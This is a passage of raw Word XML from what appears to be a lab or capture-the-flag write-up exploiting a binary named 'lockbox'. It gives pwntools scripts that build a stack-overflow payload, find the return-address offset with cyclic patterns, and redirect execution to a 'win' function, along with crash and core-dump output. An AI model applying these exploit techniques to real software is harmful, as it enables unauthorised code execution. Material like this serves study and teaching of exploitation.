              <w:tab/>
              <w:t xml:space="preserve">return base + data + </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pad0</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="716706F5" w14:textId="77777777" w:rsidR="00150680" w:rsidRDefault="00150680" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E640A87" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B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sendPld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2EF49DB5" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7952F939" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B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gdb ./lockbox -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F30030E" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B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r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FF219F5" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">d = </w:t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"&gt;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35DABF2B" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pl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keyPl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3E4B581" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F463721" w14:textId="1813EA63" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>p.interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2660FE80" w14:textId="1CD78F2D" w:rsidR="00DB49B6" w:rsidRDefault="001D6E6B" w:rsidP="00150680">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Script to Build and Send Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF26D3" w14:textId="77777777" w:rsidR="00150680" w:rsidRDefault="00150680">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46175FD7" w14:textId="1882DA58" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="00DB49B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This payload allows </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to run without err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0680" w14:paraId="6655CEB2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21A83628" w14:textId="77777777" w:rsidR="00150680" w:rsidRDefault="00150680" w:rsidP="00DF5A55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4D32570D" w14:textId="77777777" w:rsidR="00150680" w:rsidRDefault="00150680" w:rsidP="00DF5A55">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Lockbox_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F42623E" w14:textId="77777777" w:rsidR="00150680" w:rsidRDefault="00150680" w:rsidP="00DF5A55">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Switching to interactive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="50BFBA2A" w14:textId="77777777" w:rsidR="00150680" w:rsidRDefault="00150680" w:rsidP="00DF5A55">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[Inferior 1 (process 226978) exited normally]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65F27610" w14:textId="4D816A15" w:rsidR="00150680" w:rsidRDefault="00150680" w:rsidP="00150680">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Successful Execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7466CA9F" w14:textId="4B8A88F3" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">The next hurdle is determining how to call </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when the </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method returns. When the method returns, the program pops a value off the stack and attempts to jump to it. If the value at the top of the stack is not a valid address, the program will crash with another segmentation fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267837C4" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">Adding more data to the payload will overwrite the values stored in the stack, including the return address. The following script uses the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PwnTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>cyclic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> functions to find which part of the payload is at the top of the stack when </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> retur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6E6B" w14:paraId="7063E532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7708B30B" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B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testPld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23C9B525" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">base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41) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,16)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="432A9708" w14:textId="77777777" w:rsidR="007431EA" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">data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50), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("B", 0x40),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C370192" w14:textId="5D0E2F83" w:rsidR="001D6E6B" w:rsidRDefault="007431EA" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="001D6E6B">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="001D6E6B">
              <w:t xml:space="preserve">("B", 0x40), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001D6E6B">
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001D6E6B">
              <w:t>("B", 0x00)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3543E933" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">d2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00) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in range(0,4)])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="095614FC" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">d3 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cyclic(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>500)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466FB7A7" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">return base + data + d2 + </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>d3</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="46E54CAC" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65BB3581" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B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ripOffset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5A007997" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p = process(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>'./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>lockbox')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F458CFD" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">d = </w:t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"&gt;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3EBEC6" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>testPld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="242964E2" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>p.wait</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="630FF95B" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>c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.corefile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="76DE0E4B" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">stack = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cf.rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3FD74536" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>info(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = %#x", stack)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40870D19" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">pattern = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cf.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(stack, 4)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="180E41D0" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ripOffset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cyclic_find</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(pattern)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="798EA52F" w14:textId="75FF9835" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>info(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">"rip offset = %d", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ripOffset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="435CA95F" w14:textId="4759E3F2" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>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6E6B" w14:paraId="592DA544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8E3FBE3" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B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3D43115A" w14:textId="2121D6F2" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Lockbox_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50FD7406" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[+] Starting local process </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>'./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">lockbox': </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 63811</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2658EB37" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Process </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>'./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>lockbox' stopped with exit code -11 (SIGSEGV) (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 63811)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C445913" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[+] Parsing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>corefile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>...: Done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2519FB4E" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] '/home/kali/Desktop/4-Week/core.63811'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70CAAB29" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Arch:      amd64-64-little</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A153D35" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RIP:       0x4012ad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD9D0BB" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RSP:       0x7ffedf978de8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E294B6F" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Exe:       '/home/kali/Desktop/4-Week/lockbox' (0x400000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="513FAF53" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Fault:     0x6161616e6161616d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1335E05E" w14:textId="77777777" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rsp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 0x7ffedf978de8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4201C69F" w14:textId="14ED2821" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] </w:t>
            </w:r>
            <w:r w:rsidRPr="001D6E6B">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>rip offset = 48</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CB23055" w14:textId="1B156AB6" w:rsidR="00DB49B6" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED3F94" w14:textId="687B5F1E" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The fault occurred when the program tried to jump to </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0x6161616e6161616d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a value from the data added to the payload after the </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The value is at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00150680">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>48th byte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of added data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACE476" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t xml:space="preserve">To force </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>lockbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to jump to </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after its </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6E6B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method returns, the payload should look something lik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6E6B" w14:paraId="26927043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D1C6D1A" w14:textId="6F12EB4E" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[16 Chars of Padding] + [Address of Key] + [4 Chars of 0x00] + [48 Chars of Padding] + [Address of Win] + [4 Chars of 0x00]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F90FF0F" w14:textId="4AC053DC" w:rsidR="001D6E6B" w:rsidRDefault="001D6E6B" w:rsidP="001D6E6B">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F263801" w14:textId="77777777" w:rsidR="00DB49B6" w:rsidRDefault="00DB49B6" w:rsidP="00DB49B6">
      <w:r>
        <w:t>After receiving a new payload consistent with the above format, the program crashed with a segmentation error in a different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6E6B" w14:paraId="67811C33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05AA05DD" w14:textId="595CA32A" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Lockbox_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66AFA9CD" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[+] Starting local process </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>'./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">lockbox': </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 65599</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F82348C" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Process </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>'./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>lockbox' stopped with exit code -11 (SIGSEGV) (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 65599)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11269975" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[+] Parsing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>corefile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>...: Done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10D9D2A2" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] '/home/kali/Desktop/4-Week/core.65599'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F723C03" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Arch:      amd64-64-little</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C750A8B" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    RIP:       0x4011f7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21224CF7" w14:textId="77777777" w:rsidR="00844825" w:rsidRDefault="00844825" w:rsidP="00844825">
            <w:pPr>
